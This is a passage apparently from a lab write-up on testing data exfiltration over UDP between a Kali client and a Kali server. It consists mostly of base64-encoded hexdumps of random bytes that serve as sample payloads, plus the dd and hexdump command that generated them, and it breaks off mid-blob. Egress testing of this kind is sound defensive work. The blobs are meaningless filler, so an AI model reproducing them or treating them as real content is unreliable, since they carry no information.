    LX0uLi58CjAwMDAwOTEwICA3ZSA3NyA1ZSBkOCAxYyBiNiAyZCA4MyAgNDMgZDAgYzAgNGIg
    ZmMgZGUgMTMgNTggIHx+d14uLi4tLkMuLksuLi5YfAowMDAwMDkyMCAgMjQgNWYgM2MgNzEg
    OTQgNjggNTEgNWQgIDhlIDllIDBkIDk0IDQyIGFmIDM5IDY4ICB8JF88cS5oUV0uLi4uQi45
    aHwKMDAwMDA5MzAgIGI1IDVkIDkyIDFlIGM3IDE4IGY1IGY0ICBmZSA1OSBlNCA2ZSBhOCA2
    OCBlZSAzZSAgfC5dLi4uLi4uLlkubi5oLj58CjAwMDAwOTQwICA4MCA5ZSBiYiAwMiAxYSBk
    YyA5MCAwMiAgMmIgYWQgMmMgODAgMTcgNWYgODggMDkgIHwuLi4uLi4uLisuLC4uXy4ufAow
    MDAwMDk1MCAgODUgMGYgNjEgOTEgMGQgODIgYWEgZTQgIDc3IDY0IDdhIDA4IDE2IGU2IGNm
    IDNlICB8Li5hLi4uLi53ZHouLi4uPnwKMDAwMDA5NjAgIDVjIGUzIGVhIGE4IDJmIGM4IGFm
    IGZmICAwOCA5YSAyMiA3OCA5YyAyNyA1ZSA0YyAgfFwuLi4vLi4uLi4ieC4nXkx8CjAwMDAw
    OTcwICBlYiBkYiBmMyAwYSA2MSBmZiBmNCBiMiAgMzkgNmEgZjkgYmMgZTMgNjMgNDkgZDcg
    IHwuLi4uYS4uLjlqLi4uY0kufAowMDAwMDk4MCAgYTUgMmEgYjMgOWIgZTAgNTYgN2YgZGEg
    IDQ4IDhhIDhlIDc0IDVlIDk2IDhhIGMwICB8LiouLi5WLi5ILi50Xi4uLnwKMDAwMDA5OTAg
    IDY5IGZjIDg3IGQ5IDUxIDYyIDI5IDcxICAzYiBmMyAzYyBlNiA5ZSA1OSAxMCAyYiAgfGku
    Li5RYilxOy48Li5ZLit8CjAwMDAwOWEwICBiZiBkNCA2MyA5NiBmZiA5ZSBiYSAwNSAgMDIg
    YmQgOWUgNTkgNTEgZGMgODYgNjIgIHwuLmMuLi4uLi4uLllRLi5ifAowMDAwMDliMCAgY2Eg
    YTcgMzAgYTcgMzIgYzkgYmIgZDYgIGIxIGI5IDg1IGJkIDI0IGRmIGU5IGRlICB8Li4wLjIu
    Li4uLi4uJC4uLnwKMDAwMDA5YzAgIDdiIDdkIDZjIGVjIDE2IGI5IDk5IDU5ICBiZiA4NCBk
    YSBlYSAxNCA3MSA3OCBhNiAgfHt9bC4uLi5ZLi4uLi5xeC58CjAwMDAwOWQwICAxMSA5NSBm
    YSBlMiBiZCBmYSBhMyBlMSAgMTIgNzAgZDYgMjIgMDggN2YgY2YgMTMgIHwuLi4uLi4uLi5w
    LiIuLi4ufAowMDAwMDllMCAgN2YgYWEgZjkgNTQgYzggNzggZjQgYjEgIDJiIDMxIGQ5IDRl
    IGI2IDQzIDhmIGYxICB8Li4uVC54Li4rMS5OLkMuLnwKMDAwMDA5ZjAgIDExIDA5IDhkIDdh
    IDVjIDY4IDlmIGU4ICAyZiAxMCAyYyA5MCAyMCBiOCAxZSAxNyAgfC4uLnpcaC4uLy4sLiAu
    Li58CjAwMDAwYTAwICA0ZCBkMyBkNyA4NiA5YiAwYSAxNyBkYiAgMGYgMzIgZmEgZTggNDgg
    MDYgM2EgYmIgIHxNLi4uLi4uLi4yLi5ILjoufAowMDAwMGExMCAgYjQgZWYgNDkgMTEgNWQg
    OTAgYjMgYTIgIGMxIGYxIGIzIDM5IDRjIDkwIDU5IDIwICB8Li5JLl0uLi4uLi45TC5ZIHwK
    MDAwMDBhMjAgIDEzIDFmIDEwIDQwIDZhIGM2IDgyIGVlICBjNyA0OSBiMCAyMCAxNSBlYSAz
    NCA5YyAgfC4uLkBqLi4uLkkuIC4uNC58CjAwMDAwYTMwICAwMSA0MyA4YiAwNiBmMiA4OCBj
    ZCBlZCAgZjEgOTcgOTQgODkgYWYgOWMgZTEgYjggIHwuQy4uLi4uLi4uLi4uLi4ufAowMDAw
    MGE0MCAgZjMgZGIgNzYgMzkgMTUgZmQgMGQgNDIgIGQxIGIzIDIyIGUwIDI5IDBhIDNjIDgx
    ICB8Li52OS4uLkIuLiIuKS48LnwKMDAwMDBhNTAgIDRlIGMwIDAyIGJiIDRhIDBiIGFmIGJl
    ICA3OSA2YiA3MSA1OSA4MiAzOSAyNSBmYiAgfE4uLi5KLi4ueWtxWS45JS58CjAwMDAwYTYw
    ICAyMCAwNCA5MiA1OSBmNiA1ZCA3MiBjYyAgYWIgZTcgNjEgNmQgNmUgODUgZjcgNzQgIHwg
    Li5ZLl1yLi4uYW1uLi50fAowMDAwMGE3MCAgNDMgZDkgM2MgMTkgZDggZDEgNmUgZmYgIDY5
    IDgzIGQwIGIwIGNmIGZiIDc0IGM0ICB8Qy48Li4ubi5pLi4uLi50LnwKMDAwMDBhODAgIDlk
    IDNkIGZiIDk5IDkxIDFlIGY4IGVlICBiNiBmNyAwMiBiNCBmMyBlYSAwOCA4YyAgfC49Li4u
    Li4uLi4uLi4uLi58CjAwMDAwYTkwICA0YyA2MiBhZiA2MyAwMiA0MCBmNyAwOSAgZGUgNTUg
    ZTkgMTcgNDggN2UgYzkgZDggIHxMYi5jLkAuLi5VLi5Ifi4ufAowMDAwMGFhMCAgOTQgYzIg
    NzQgNmYgZGIgYzYgMGIgN2QgIGFmIGE5IGJkIDBlIDNkIDllIGE0IDViICB8Li50by4uLn0u
    Li4uPS4uW3wKMDAwMDBhYjAgIGUzIDY4IGRiIGJiIGFjIGMzIDY4IDk4ICAyOSAwZCAxYiAy
    MiBiMyBkYiAzOCAwZSAgfC5oLi4uLmguKS4uIi4uOC58CjAwMDAwYWMwICBmMCBiMCBkYiBj
    NSA5ZSBlYSAwOSA0NCAgZjUgNTQgMWYgN2QgOTYgZTUgNTMgMWQgIHwuLi4uLi4uRC5ULn0u
    LlMufAowMDAwMGFkMCAgYWMgZTUgZWQgMzYgMTkgZmIgYzQgNGMgIDcyIDhmIGRiIDM3IGE2
    IDczIDJlIGQ1ICB8Li4uNi4uLkxyLi43LnMuLnwKMDAwMDBhZTAgIDI1IDBhIDE1IGQzIDNh
    IDA1IGVhIDQ4ICAxZiA4NyAzMiBhOCBlOCBkNyAxZCA1MCAgfCUuLi46Li5ILi4yLi4uLlB8
    CjAwMDAwYWYwICA3MiA4ZSAxZSBiNSA0ZiBmNiBhYyA4ZiAgNDcgMWQgYTcgNTQgNDIgMzMg
    NGEgMDggIHxyLi4uTy4uLkcuLlRCM0oufAowMDAwMGIwMCAgOTggNDIgMGYgZTkgMWYgZWMg
    Y2EgYjAgIDAyIDdhIDBjIGI5IGI5IDU4IDEzIDk3ICB8LkIuLi4uLi4uei4uLlguLnwKMDAw
    MDBiMTAgIGZhIDk4IDFkIDI0IDhiIDFjIDU1IDc5ICA3YiAxNCA1YyA3MyA0ZCAwNCAxNCAw
    MSAgfC4uLiQuLlV5ey5cc00uLi58CjAwMDAwYjIwICA5NCBmOSA4MyBmNyAwYyBjMCAwZiA4
    OCAgNjkgYzkgYTMgOWQgZWUgNTAgNTIgYzEgIHwuLi4uLi4uLmkuLi4uUFIufAowMDAwMGIz
    MCAgYjYgZTUgNTcgOTAgNjMgNTYgMzQgMzkgIGE3IDM3IGI3IGI4IDZiIDBkIGI4IDM1ICB8
    Li5XLmNWNDkuNy4uay4uNXwKMDAwMDBiNDAgIGU5IDBjIDYzIDU3IDE4IDE2IDY1IDE3ICAy
    NiBkNSAxYiAxNyA5MSBjZSA5OSA0ZCAgfC4uY1cuLmUuJi4uLi4uLk18CjAwMDAwYjUwICBh
    NyA5ZSAxOSBkZCBkOCA4NyAzMSBhZCAgMDIgNWYgMzkgYzQgYjQgNGYgMDcgZDcgIHwuLi4u
    Li4xLi5fOS4uTy4ufAowMDAwMGI2MCAgNDAgNDEgMjYgNmYgMDkgZTIgYWQgOTMgIGIxIDYw
    IDU4IGVkIGFkIGEwIGI1IGFmICB8QEEmby4uLi4uYFguLi4uLnwKMDAwMDBiNzAgIGVmIDk0
    IDk0IGYwIGE2IGFiIDM5IDEzICAzZCBlMSAwNyBmMCBlZCA3NiBkNiBmZiAgfC4uLi4uLjku
    PS4uLi52Li58CjAwMDAwYjgwICA1MyBhZSBiMyA5YyBlYSBmNiAzNyBmZiAgYjUgZjggYTgg
    OTAgYjEgM2UgNDQgOTAgIHxTLi4uLi43Li4uLi4uPkQufAowMDAwMGI5MCAgY2EgNjIgM2Eg
    MzggNjMgZWMgMTMgNmMgIGM3IDlhIDA1IDdhIDVlIGM4IGYzIDY5ICB8LmI6OGMuLmwuLi56
    Xi4uaXwKMDAwMDBiYTAgIDczIDZhIDI4IDNhIGJlIGY3IGY2IDNmICA3ZSAxMyBkNCBjNyBl
    ZSA1YSA4YyA1NiAgfHNqKDouLi4/fi4uLi5aLlZ8CjAwMDAwYmIwICBhNyA5YyA2ZiA0YiBh
    NSA4NiBlMSA4YyAgZDcgMDMgMmQgNDQgOWUgYjggNDkgODMgIHwuLm9LLi4uLi4uLUQuLkku
    fAowMDAwMGJjMCAgMWEgMGIgMzYgYWUgM2QgMTkgYWMgMjEgIGVlIDIwIDQwIGQxIGYxIDIy
    IDYyIDg3ICB8Li42Lj0uLiEuIEAuLiJiLnwKMDAwMDBiZDAgIDY0IDM4IGMxIDE0IDY2IDUz
    IGJlIDY5ICBhOSA0NCA4ZiBjYSA5MSBjMiBmZiAwNiAgfGQ4Li5mUy5pLkQuLi4uLi58CjAw
    MDAwYmUwICBhNiAwYyA0MyAwYiA4MCBiZCAxOCAyOSAgYjkgY2QgNTYgOTAgNjcgNmMgMmQg
    Y2EgIHwuLkMuLi4uKS4uVi5nbC0ufAowMDAwMGJmMCAgZTcgZjMgMjIgMGUgMzIgOGUgZDEg
    Y2YgIDBlIGY5IDA3IDcxIDllIGM2IDdhIDYzICB8Li4iLjIuLi4uLi5xLi56Y3wKMDAwMDBj
    MDAgIGE4IDVkIDI2IGUxIGQ4IDliIGVmIGE5ICAxMiA1MiA1MCBiYyAxOSBkZiBhNCA5NiAg
    fC5dJi4uLi4uLlJQLi4uLi58CjAwMDAwYzEwICA5MyAxMSA4MSA3NiA4OSAzZiBmOSBjMiAg
    M2EgZjIgYmMgMmIgNjAgYjUgY2QgOWIgIHwuLi52Lj8uLjouLitgLi4ufAowMDAwMGMyMCAg
    YTIgOWEgNDggNzkgNWUgZDQgODMgZWQgIDg1IGFjIDI5IDE0IDYwIDI3IDNiIDBjICB8Li5I
    eV4uLi4uLikuYCc7LnwKMDAwMDBjMzAgIDllIGUwIGZiIGNlIGIxIDMwIGMwIGVlICBmMSBl
    YyAzOCA2NiA2YSBiNiA0MSBhNSAgfC4uLi4uMC4uLi44ZmouQS58CjAwMDAwYzQwICAzOCAx
    MyA5MyA3NyBiNyA4NSBjZiAzYiAgNDEgNGYgOTEgZjUgZDIgZjUgNTQgMjUgIHw4Li53Li4u
    O0FPLi4uLlQlfAowMDAwMGM1MCAgZWIgNWQgMjkgMTIgMjMgY2EgMWMgZWIgIDNmIDhkIGU4
    IDcwIDM1IGE0IDZkIDE1ICB8Ll0pLiMuLi4/Li5wNS5tLnwKMDAwMDBjNjAgIGQ4IGM5IGQ1
    IDJiIGVlIDU2IGJkIDZiICBjMiBiYyAyMSA1MyAwMiBiZiA0OCAyOSAgfC4uLisuVi5rLi4h
    Uy4uSCl8CjAwMDAwYzcwICBiNyBkOSAwYSBiMCA0NiBmOSA5ZSA5MSAgZjEgMWQgMTcgZmIg
    YTcgMmIgNDAgODEgIHwuLi4uRi4uLi4uLi4uK0AufAowMDAwMGM4MCAgYzggNzMgMDUgYjQg
    NDggMGEgOGIgOWEgIDM4IDFhIGUwIDZlIDIzIGZlIDg3IDJmICB8LnMuLkguLi44Li5uIy4u
    L3wKMDAwMDBjOTAgIDFkIDc1IDBkIGI0IDJlIDcyIDZjIGI3ICAwNCBmZCBhZCAxNiBkZCBj
    YyAwOCA2ZSAgfC51Li4ucmwuLi4uLi4uLm58CjAwMDAwY2EwICAxMCA1NSAxYiBjZCA0NCA4
    ZCBmYiBlZCAgMDMgZDkgYmIgNTggMDUgMDcgY2QgYTUgIHwuVS4uRC4uLi4uLlguLi4ufAow
    MDAwMGNiMCAgZWQgMmQgNzMgNTQgODEgZjAgMGQgZTcgIGQ5IGY2IGZlIDdjIGQyIDJjIDdk
    IDIxICB8Li1zVC4uLi4uLi58Lix9IXwKMDAwMDBjYzAgIDM3IDMzIDE2IDVhIDA0IGJhIGE3
    IDNkICA5NSAzZCAxOCA0ZSA3YiBhYSA5YSAxYiAgfDczLlouLi49Lj0uTnsuLi58CjAwMDAw
    Y2QwICBiZCA4NyAwOSA3NiA4OSBlYiA0NyA2MiAgOGEgNjggZDYgOGEgYTcgZjcgMzkgODUg
    IHwuLi52Li5HYi5oLi4uLjkufAowMDAwMGNlMCAgYmYgOTggZDEgMDMgZjAgMDcgZmUgYTgg
    IGNkIDg2IDQ4IDcwIDMwIDFlIDJmIDMyICB8Li4uLi4uLi4uLkhwMC4vMnwKMDAwMDBjZjAg
    IGMzIGFlIGE0IGI4IDhjIGIwIDQwIDcxICBiNCBmYyBhOCAwZSA4ZiBlMSA1ZSBjNiAgfC4u
    Li4uLkBxLi4uLi4uXi58CjAwMDAwZDAwICA3MSBlZSA5OSA0NSBiNiBiOCAzZCA5NyAgMmQg
    OTIgOGYgMGUgYmYgODYgNDMgMzIgIHxxLi5FLi49Li0uLi4uLkMyfAowMDAwMGQxMCAgOWYg
    MmMgYzMgMTggYWMgMDMgYWMgMGEgIGM3IGIyIGY1IDg4IDFlIDkxIGFlIDM2ICB8LiwuLi4u
    Li4uLi4uLi4uNnwKMDAwMDBkMjAgIGQzIGQwIDc1IGJlIGU0IDU3IGY2IDllICBkYyA1MyA0
    ZSA4NCBiMCBkNyAwNCA3MSAgfC4udS4uVy4uLlNOLi4uLnF8CjAwMDAwZDMwICAxMSAyMCBl
    OSBlOSBlMyBjMCBmOSA5NSAgNjUgYzcgNzkgMzggZTEgOTQgNzcgNjUgIHwuIC4uLi4uLmUu
    eTguLndlfAowMDAwMGQ0MCAgZWIgN2QgM2MgODQgYmUgYTYgZmIgYTYgIGJmIGIxIGFlIGQz
    IGU3IDdjIGViIGI2ICB8Ln08Li4uLi4uLi4uLnwuLnwKMDAwMDBkNTAgIDM4IDBmIDNmIGNm
    IDMyIGIwIGE4IDRmICBiOCBhZSA0ZCA4MCAyNSA0ZCBmYiA1MyAgfDguPy4yLi5PLi5NLiVN
    LlN8CjAwMDAwZDYwICA0MCA3ZSA2OCAzYSA2MSAzOCAzMyA0MiAgZjAgZGQgZTMgMTYgMjYg
    ODggYjkgNjIgIHxAfmg6YTgzQi4uLi4mLi5ifAowMDAwMGQ3MCAgNTYgZjcgYjMgZDcgZGMg
    ZjcgYjYgM2YgIDNkIDM5IDAyIDk0IGM5IDNlIGJmIGZiICB8Vi4uLi4uLj89OS4uLj4uLnwK
    MDAwMDBkODAgIDVkIGZlIDE0IDAwIDVhIDQzIDQ3IDJhICAxNCBjNiAzOCBjZSA3MiAwMSA3
    NyBlZiAgfF0uLi5aQ0cqLi44LnIudy58CjAwMDAwZDkwICA2NSAxOSA1ZCA0NCA3ZSA2MSBl
    YSA5YSAgNWYgZDggMDcgNzMgMDYgNzYgODMgMmQgIHxlLl1EfmEuLl8uLnMudi4tfAowMDAw
    MGRhMCAgYTYgOTYgNTMgNzggMWUgZmMgNzUgYTEgIDY3IGU3IDE4IDgwIDllIDc3IGI3IGQ4
    ICB8Li5TeC4udS5nLi4uLncuLnwKMDAwMDBkYjAgIGJhIGJmIGEyIDlmIDljIGM4IDE5IDUy
    ICA4ZCA2NiBiNCA4MiBiMCA0NSA3ZSA5OSAgfC4uLi4uLi5SLmYuLi5Ffi58CjAwMDAwZGMw
    ICAwMSBlMSA2NCA3MCBiNiA4ZCBkNiA5NyAgZTkgMjEgNTYgZWMgMjUgZTIgYzEgMTQgIHwu
    LmRwLi4uLi4hVi4lLi4ufAowMDAwMGRkMCAgNjcgZGEgZmIgZWEgYTMgNjggOTkgMzcgIGMx
    IGM2IDAzIGJkIGQ4IDM2IDA4IDU0ICB8Zy4uLi5oLjcuLi4uLjYuVHwKMDAwMDBkZTAgIDRh
    IDU5IGExIDRkIGE1IDBhIDdlIDQ4ICBkMCA2ZiA3ZCBiNiAzYiBjNyA3YSAyMSAgfEpZLk0u
    Ln5ILm99LjsueiF8CjAwMDAwZGYwICBiMCAzZCA5NCAyYyBhZSA4OSBiZCAwNiAgODEgOTcg
    ODggMTYgYzkgMGUgNDcgMDggIHwuPS4sLi4uLi4uLi4uLkcufAowMDAwMGUwMCAgOWEgNWEg
    OWMgMTQgN2MgMTAgY2YgZjMgIGJhIGFmIDc3IDM5IGYzIDQ4IGQyIDdmICB8LlouLnwuLi4u
    Lnc5LkguLnwKMDAwMDBlMTAgIGY1IGQ2IDIwIDQ3IGUxIDk3IDM5IDM4ICBjMSBiYiBjOSA1
    YyA0NSA3OSBkZCBiOCAgfC4uIEcuLjk4Li4uXEV5Li58CjAwMDAwZTIwICAxNiBiNyA2NSBi
    YSBmNSA0MSAyZiA0ZCAgMGYgYTkgNzAgOTEgOGIgYmIgZmMgN2YgIHwuLmUuLkEvTS4ucC4u
    Li4ufAowMDAwMGUzMCAgNzkgYWYgNmUgNDggOWUgOGUgMDQgZDAgIDRiIGZmIDRlIGRhIDMz
    IDdiIDNlIDQ4ICB8eS5uSC4uLi5LLk4uM3s+SHwKMDAwMDBlNDAgIDlmIDU3IGZmIDQ3IGNm
    IDAxIGE4IDg4ICA3MyA3ZSBhNCBhOSA5MiBkMCBlOSAxNSAgfC5XLkcuLi4uc34uLi4uLi58
    CjAwMDAwZTUwICBkYyAxYyA3OCA4OCBhZSBlMyA2OCBjZiAgNTMgZTQgMjUgZmMgZjggYzgg
    MzAgZDMgIHwuLnguLi5oLlMuJS4uLjAufAowMDAwMGU2MCAgNjEgYzcgNWMgMDMgNzggMWEg
    N2IgMTggIDViIDVjIGEwIGFkIDg0IGE1IGZmIDBkICB8YS5cLnguey5bXC4uLi4uLnwKMDAw
    MDBlNzAgIDYyIDE0IGMxIDAwIDRkIDJhIDYwIGIzICBkNCA3OCA5NyBiNiAyZiAxMSA4ZCA2
    NCAgfGIuLi5NKmAuLnguLi8uLmR8CjAwMDAwZTgwICAyNiA4YiA5OCBhYSBmOCA0YiAxMiBh
    NSAgYmIgZjUgODUgNGEgYWIgODggZGYgZjkgIHwmLi4uLksuLi4uLkouLi4ufAowMDAwMGU5
    MCAgYzQgYmIgNTAgMjUgZDYgNjUgYTggZTQgIDcwIGJlIDI0IDY0IGY2IGYxIGEyIDRlICB8
    Li5QJS5lLi5wLiRkLi4uTnwKMDAwMDBlYTAgIDI4IDcwIGJhIGZlIDEwIGM1IDM1IDAwICAx
    NyA0YiBmNyA3MSA5MSA2YiBmMCAyMCAgfChwLi4uLjUuLksucS5rLiB8CjAwMDAwZWIwICBh
    NiA2MiBkZSA0MiA0OCA1NyAzZSAzNCAgZTggZGQgNWUgZmMgY2QgMWEgZDUgNzIgIHwuYi5C
    SFc+NC4uXi4uLi5yfAowMDAwMGVjMCAgMzUgNGUgYmIgM2EgNjYgN2YgODQgOTkgIDNmIGI1
    IGI1IDg0IDUyIDkyIGM3IGY5ICB8NU4uOmYuLi4/Li4uUi4uLnwKMDAwMDBlZDAgIDkxIGQ5
    IGRjIGQ1IDBmIGU2IGYyIGI4ICBmOSAzZiA2ZSBhOCBjZSBjNCA5MiA5NiAgfC4uLi4uLi4u
    Lj9uLi4uLi58CjAwMDAwZWUwICA4ZSAyYyAwNiBjNyBjYiA1OSBmNiBjOCAgMDEgMmMgOTMg
    MjcgYjYgYWUgMmEgMjIgIHwuLC4uLlkuLi4sLicuLioifAowMDAwMGVmMCAgZTEgMDUgOTQg
    NTAgM2IgYjAgYjUgZWMgIDYwIGE0IDBlIGJlIGUxIGZhIGVlIDU2ICB8Li4uUDsuLi5gLi4u
    Li4uVnwKMDAwMDBmMDAgIGE5IDM0IDljIGYwIGI1IGZkIDc2IDA1ICA2MCA2ZSBmZCBlMSAx
    MCA5MCA5NyBlNCAgfC40Li4uLnYuYG4uLi4uLi58CjAwMDAwZjEwICA1ZSBlZiA0MyA1MCBk
    MiA5NyBlNyBlYyAgNTYgYmQgNjIgOTAgZWYgYjAgOTEgOTAgIHxeLkNQLi4uLlYuYi4uLi4u
    fAowMDAwMGYyMCAgNzMgMDQgODMgOGMgYzUgMTAgYWIgYWEgIDFiIGRjIDFlIGVhIGNkIGJi
    IDQ2IDI0ICB8cy4uLi4uLi4uLi4uLi5GJHwKMDAwMDBmMzAgIGYxIDI1IDg2IDMzIDMyIGRk
    IDY3IDdlICA2ZiA1NyAzMSBmNyBlOCA0NSBlNyAxZSAgfC4lLjMyLmd+b1cxLi5FLi58CjAw
    MDAwZjQwICAxNCA3ZCA2NiA2ZiA0MCBlMSAwOSA1NSAgZjcgM2IgYTUgNmUgNTUgOTIgNDgg
    YmIgIHwufWZvQC4uVS47Lm5VLkgufAowMDAwMGY1MCAgZmQgMWUgMTIgODIgZGEgYWMgODUg
    NTYgIGZjIDA5IDRhIGZiIDY4IDU3IDc0IDVmICB8Li4uLi4uLlYuLkouaFd0X3wKMDAwMDBm
    NjAgIGU5IDhiIDhjIDFhIDJkIGI1IDgxIGY1ICBlYSBkZCAyMSA4OSAwZCBkMCA2OCA3YyAg
    fC4uLi4tLi4uLi4hLi4uaHx8CjAwMDAwZjcwICA4MSA0ZiBiMCA0YSAxOCA4NSA5MSBkMSAg
    NjQgYjAgOWUgMDEgMjAgY2IgMzYgZGMgIHwuTy5KLi4uLmQuLi4gLjYufAowMDAwMGY4MCAg
    NTYgMWYgNmUgNTQgMTggYjQgOGUgYTQgIGJkIGNiIGNlIGYyIDE4IDBhIGEyIGY4ICB8Vi5u
    VC4uLi4uLi4uLi4uLnwKMDAwMDBmOTAgIGQ2IDEzIGQwIDk4IDdlIDFhIGMzIGFjICBlMyBl
    NiAwYiA0YyBiMyA4YiA3ZiA1MCAgfC4uLi5+Li4uLi4uTC4uLlB8CjAwMDAwZmEwICBmZCBl
    NCA0MSBiNyBlYiAxYSBkMiAwZSAgNmEgYjQgOWYgNWUgNTYgMDEgYWUgNzYgIHwuLkEuLi4u
    LmouLl5WLi52fAowMDAwMGZiMCAgMTUgNTIgYTUgYmIgYTIgZGQgMWIgYTIgIDIwIGM2IDM5
    IDc1IGRlIDhkIDU5IDA2ICB8LlIuLi4uLi4gLjl1Li5ZLnwKMDAwMDBmYzAgIGIyIGM1IGMy
    IDhlIDY5IDBiIDA3IDIzICBiNCBiOSAzMCBlZCAyZiBlYSAwZiA1NCAgfC4uLi5pLi4jLi4w
    Li8uLlR8CjAwMDAwZmQwICAxMyBjNCA4NiA2OSAwZSBjMyBlMSA2ZCAgMTQgMzQgOWMgYzgg
    MTYgOTEgMmQgNzEgIHwuLi5pLi4ubS40Li4uLi1xfAowMDAwMGZlMCAgNzEgMDUgYWUgZDQg
    ZjcgM2MgYjIgZGYgIDMyIDNiIGYyIGExIDIyIGYwIGJjIDU2ICB8cS4uLi48Li4yOy4uIi4u
    VnwKMDAwMDBmZjAgIDgxIDVhIGFlIDliIDgwIDU5IGUyIDdmICAwZSBkZiBhYSBhOCBjMiBi
    MSBkNCAzYiAgfC5aLi4uWS4uLi4uLi4uLjt8CjAwMDAxMDAwICBjOCBmZSAxOCAwMyBlYiA4
    NCAyOCAxYSAgMjMgYzIgMGMgZGYgYzQgZmEgNjAgNDQgIHwuLi4uLi4oLiMuLi4uLmBEfAow
    MDAwMTAxMCAgN2MgNmEgZjEgMTcgY2UgM2QgYzQgZWQgIDUyIGMxIDk0IDM1IDA2IGQ3IDQ2
    IGY5ICB8fGouLi49Li5SLi41Li5GLnwKMDAwMDEwMjAgIDE1IDIzIGU5IDY2IDQyIDUwIDA5
    IDRmICAxMyA2YSA0NSAzNCA4ZCBmMSBlMiBjNCAgfC4jLmZCUC5PLmpFNC4uLi58CjAwMDAx
    MDMwICA0ZiBkMyA2YyA3OSA5YSBhOCBmZSBiZCAgNzAgM2MgODQgODQgNzIgMjAgZDkgZTcg
    IHxPLmx5Li4uLnA8Li5yIC4ufAowMDAwMTA0MCAgNmMgZjcgOWYgNWMgNDkgNWYgMzIgMTIg
    IDU3IGI0IDJiIDUwIGQ1IDUxIDY2IDJmICB8bC4uXElfMi5XLitQLlFmL3wKMDAwMDEwNTAg
    IGE5IDEyIDRiIDE0IDE2IGU3IDA4IDFiICA4ZiBmZCA0NiAzNSAwMyBmMCA1NCA5OCAgfC4u
    Sy4uLi4uLi5GNS4uVC58CjAwMDAxMDYwICAyMCAwNyAwNSA4MiA4ZiAwNSBlYiBjZiAgZmMg
    YjMgZTggMmMgNDcgZDQgNTMgMDcgIHwgLi4uLi4uLi4uLixHLlMufAowMDAwMTA3MCAgNGEg
    NzIgMmEgMmUgNWYgOGIgYWIgYWYgIDBjIDc4IGVlIGFlIGU2IDNhIGQxIDNkICB8SnIqLl8u
    Li4ueC4uLjouPXwKMDAwMDEwODAgIDI1IDIwIDk3IGMxIDIwIDliIGUzIGQ1ICA0NSBlNSBl
    ZCAxYyBlYyA2MCA2NSAxNyAgfCUgLi4gLi4uRS4uLi5gZS58CjAwMDAxMDkwICBmZSBiNSBh
    NCA4YSBjMyBlOCBjZCA1ZCAgMmEgYjcgNzAgNmMgMTggMWQgYjAgZWYgIHwuLi4uLi4uXSou
    cGwuLi4ufAowMDAwMTBhMCAgMWQgMmEgZTIgMjcgOTIgZjIgZTIgZjAgIDkzIDE1IDIzIDhi
    IDI2IDRhIGM0IDUyICB8LiouJy4uLi4uLiMuJkouUnwKMDAwMDEwYjAgIDJmIDIwIGEwIDA3
    IDNiIDIwIDNiIDU0ICBmMCAyOCAxZiAxZiAzNiBmOCA3YSBjNiAgfC8gLi47IDtULiguLjYu
    ei58CjAwMDAxMGMwICBjMyA5ZCAxMSA5OCAzMCA4OSBmZSBmOCAgYjMgMGYgMTIgZWQgNjMg
    ZTgKCg==
    kali-lan-client#

### Example payload for the Exfiltration of data using UDP and any
port to any IP

This example payload was generated using `dd` and `hexdump -C` (e.g.:
`dd if=/dev/urandom bs=1M count=1 | hexdump -C > exfiltration-udp-2`).

    kali-wan-server% base64 exfiltration-udp-2
    MDAwMDAwMDAgIDQ0IDY4IDI2IDlhIDcyIGU0IDIzIDBlICA2NyBjMCA3YyA5YyA1ZSA3MSBlYiA2
    OCAgfERoJi5yLiMuZy58Ll5xLmh8CjAwMDAwMDEwICA3OSBjYiBhOCBhMiA3OCAwOSA5OSA2NiAg
    YmYgODIgYjQgN2EgMGQgZDYgOGIgMWQgIHx5Li4ueC4uZi4uLnouLi4ufAowMDAwMDAyMCAgZTkg
    YTUgMTYgZTcgZWQgNTAgZWEgNWUgIDE4IGNmIGRiIDU5IDZlIGFmIDE3IGZhICB8Li4uLi5QLl4u
    Li5Zbi4uLnwKMDAwMDAwMzAgIDYxIDA0IDE4IDczIGU1IDAyIDMwIDg1ICAyZiAxMiBjYSA0YyBm
    NSA5NSAxZSBlMCAgfGEuLnMuLjAuLy4uTC4uLi58CjAwMDAwMDQwICBiZCBkZiAxZiBlMSBmYSAx
    NiAyMSAwYiAgNDQgZmIgZGYgYmQgNjggYmUgZjYgOWEgIHwuLi4uLi4hLkQuLi5oLi4ufAowMDAw
    MDA1MCAgZDYgMDUgMGMgNDIgZmUgZTIgM2MgZTkgIDM1IDQwIGYyIGMzIDdhIGMyIGZjIDNkICB8
    Li4uQi4uPC41QC4uei4uPXwKMDAwMDAwNjAgIDk4IGNkIDRiIGNhIGM0IGVlIDVmIGZhICBjZCAy
    YSA4NSBmOCA4ZSA4YiAxZCBlMSAgfC4uSy4uLl8uLiouLi4uLi58CjAwMDAwMDcwICBiNyAwOCAw
    ZCA4YSA3NSBmOSA3OSA5NyAgMmUgMmUgN2YgNDAgMzAgYjMgZDggZmEgIHwuLi4udS55Li4uLkAw
    Li4ufAowMDAwMDA4MCAgNTQgODQgZTUgYTUgMzAgNzQgYTIgYjYgIGFlIDcwIGJhIGViIDFiIDkz
    IDIyIGJlICB8VC4uLjB0Li4ucC4uLi4iLnwKMDAwMDAwOTAgIDVjIDhkIDVlIDI3IGZhIGQ4IDdm
    IDUzICA0OSBkMSBmMCA2NSA5OCAzNSA2MyAyYSAgfFwuXicuLi5TSS4uZS41Yyp8CjAwMDAwMGEw
    ICA5MiAwYiAzZSBjNCA3NyBlMyA5YiA5ZSAgNjUgNTcgZDggYTIgZTUgNWUgYjMgOTkgIHwuLj4u
    dy4uLmVXLi4uXi4ufAowMDAwMDBiMCAgZDMgOWIgMDkgMjggNzYgOTYgN2YgZDUgIDkwIDgyIGIy
    IDYwIDk5IGM2IDc4IGQzICB8Li4uKHYuLi4uLi5gLi54LnwKMDAwMDAwYzAgIDY5IGY5IDkwIGQz
    IGNmIGQxIGZhIGQxICA3MCBlOSAxZSAyMCAwNiA0YSAyNCBkYiAgfGkuLi4uLi4ucC4uIC5KJC58
    CjAwMDAwMGQwICA5NCAyNiAwOSAwZSA3OSA3MyAwOCA2NSAgOWMgMGIgOWYgODggMmUgMDIgYTUg
    NzcgIHwuJi4ueXMuZS4uLi4uLi53fAowMDAwMDBlMCAgOTYgODkgZWEgMDggOTMgNzggZTEgNzAg
    IDVmIDU0IGUzIDI2IDhhIDJiIGMyIGUwICB8Li4uLi54LnBfVC4mLisuLnwKMDAwMDAwZjAgIGUx
    IGY4IDY4IGE0IGFlIGZhIDAwIGI0ICBmOCBmZCAzNSA2NyBlNiBkNiAxZCA0MSAgfC4uaC4uLi4u
